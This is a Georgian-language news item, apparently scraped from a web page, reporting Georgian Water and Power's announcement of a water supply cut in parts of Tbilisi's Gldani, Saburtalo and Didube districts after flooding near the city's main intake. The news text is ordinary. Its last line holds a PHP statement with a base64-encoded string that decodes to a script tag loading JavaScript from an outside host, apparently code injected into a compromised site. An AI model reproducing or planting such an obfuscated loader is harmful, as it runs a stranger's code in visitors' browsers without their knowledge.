celsiusi
ავერსი საქკაბელი
კომპანია „ჯორჯიან უოთერ ენდ ფაუერში“ აცხადებენ, რომ მცხეთა-მთიანეთში სტიქიით გამოწვეული მოვლენების გათვალისწინებით, წყლის ამღვრევის პრევენციის მიზნით, თბილისის ნაწილს წყალმომარაგება შეეზღუდება.
 
როგორც კომპანიაში განმარტავენ, უხვმა ნალექმა განმეორებით გამოიწვია საგურამოსა და ბულაჩაურის მიმდებარე ტერიტორიების დატბორვა, სადაც დედაქალაქის წყალმომარაგების ძირითადი სათავე ნაგებობაა განთავსებული.
 
„დღეს, 13 ივნისს, მცხეთა-მთიანეთის რაიონში სტიქიური მოვლენების შედეგად, უხვმა ნალექმა განმეორებით გამოიწვია საგურამოსა და ბულაჩაურის მიმდებარე ტერიტორიების დატბორვა. აღნიშნულ ტერიტორიებზე განთავსებულია დედაქალაქის წყალმომარაგების ძირითადი სათავე ნაგებობა და წყალშემკრები აუზები, საიდანაც თბილისის მოსახლეობას სასმელი წყლის მიეწოდება.
 
სტიქიით გამოწვეული მოვლენების გათვალისწინებით, წყლის ამღვრევის პრევენციის მიზნით, წყალმომარაგება შეეზღუდება დღეს 13 ივნისს, 23:00 საათიდან 14 ივნისის დღის 12:00 საათამდე:
 
გლდანის რაიონში – გლდანის I, IV-VIII მიკრორაიონებს, სოფელ ბერთუბანს, გიორგიწმინდას, მიქატაძის, მაისურაძის, მებაღიშვილის, ჯანჯღავას, კაჭარავას, მეგობრობის, ანდრონიკაშვილის, 26 მაისის, გმირ კურსანტთა, ბოჭორიშვილის, ლიბანის, ბარისახოს, გაგრის, გლდანის ხევისა და მიმდებარე ქუჩებს; თიანეთის გზატკეცილს; ზაჰესში – გრ. ხანძთელის, სხვიტორის, კასკადის და მიმდებარე ქუჩებს.
 
საბურთალოს რაიონში – ქოშიგორას, სასოფლოსა და ბენდუქიძის დასახლებას, ზურგოვანას, ფარნავზის, გიორგი ბრწყინვალეს, პეტრიწის, მირიან მეფის, ფარნავაზ მეფის, ნიკო ბურის, შერმადინის, ავთანდილის, ნურადინ ფრიდონის, ცამეტი ასურელი მამის, როსტევანის, დავით აღმაშენებლის, თოფურიას ქუჩებს, ვაშლიჯვრის კორპუსებს და დასასახლებას, სარაჯიშვილის, გოძიაშვილის, მარშალ გელოვანის გამზირს, იასამნის, გაგარინის, ლვოვის, ასათიანის, ტაშკენტის, ბუდაპეშტის, კანდელაკის, თამარაშვილის, ზემო ვეძისის, ვაზისუბნის, ალასანიასა და მიმდებარე ქუჩებს.
 
დიდუბის რაიონში – აღმაშენებლის ხეივანი მე-12 კილომეტრს, დიღმის მასივის I კვ-ის N10-12 კორპუსებს.
 
„ჯორჯიან უოთერ ენდ ფაუერი“ ბოდიშს უხდის მომხმარებლებს შექმნილი დისკომფორტისთვის. სამუშაოების მიმდინარეობისას, წყალმომარაგების სრულად აღდგენამდე კომპანია მოსახლეობას წყალს ცისტერნებით მიაწვდის.
 
წყალმომარაგების შეზღუდვისა და აღდგენის შესახებ ინფორმაციას „ჯორჯიან უოთერ ენდ ფაუერი“ აბონენტებს წინასწარ, SMS-შეტყობინების სახით უგზავნის. დეტალური ინფორმაციის მოძიება შესაძლებელია კომპანიის ცხელი ხაზის – 2 93 11 11, ფეისბუქისა და ვებგვერდის მეშვეობით – http://www.gwp.ge“, – ნათქვამია კომპანიის მიერ გავრცელებულ განცხადებაში.
576
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");